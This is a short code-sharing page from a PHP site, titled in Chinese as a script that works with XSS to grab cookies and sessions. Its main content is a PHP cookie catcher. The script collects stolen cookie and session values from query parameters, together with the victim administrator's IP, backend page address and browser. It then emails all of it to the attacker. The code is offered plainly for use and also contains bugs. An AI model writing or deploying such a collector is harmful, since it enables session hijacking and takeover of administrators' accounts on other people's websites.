xss配合php获取cookie和session的脚本

PHP中文网

Lepaskan： 2016-05-25 17:09:58

asal

1938 orang telah melayarinya

1. [代码][PHP]代码

<?php
$ip = $_SERVER[&#39;REMOTE_ADDR&#39;];
$to=&#39;xxx@yeah.net&#39;;
$referer = $_SERVER[&#39;HTTP_REFERER&#39;];
$cookie = $_GET[&#39;cookie&#39;]; 
$session = $_GET[&#39;session&#39;];
$agent = $_SERVER[&#39;HTTP_USER_AGENT&#39;];
$subject=&#39;远程XSS获取地址-域名：&#39;.$referer;
$body="<p> 远程管理员IP= ".$ip."<p> 访问时间=" . date(&#39;d-m-Y&#39;).
"<p> 后台地址=".$referer."<p> 浏览器类型=".$agent."<p> 当前页面地址=".$referer."<p> COOKIE信息=".$cookie."<p> Session信息=".$$session.&#39; &#39;.
$headers= &#39;MIME-Version: 1.0&#39; . "\r\n";
$headers.= &#39;Content-type: text/html; charset=utf-8&#39; . "\r\n";
$headers.="Cleanreport.com";
mail($to, $subject, $body, $headers);
?>

Salin selepas log masuk

Label berkaitan：

php

sumber：php.cn

Artikel sebelumnya：360通用防护过滤用户输入的数据，实现防注 Artikel seterusnya：php版筛选需要的文件

Kenyataan Laman Web ini

Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn

Artikel terbaru oleh pengarang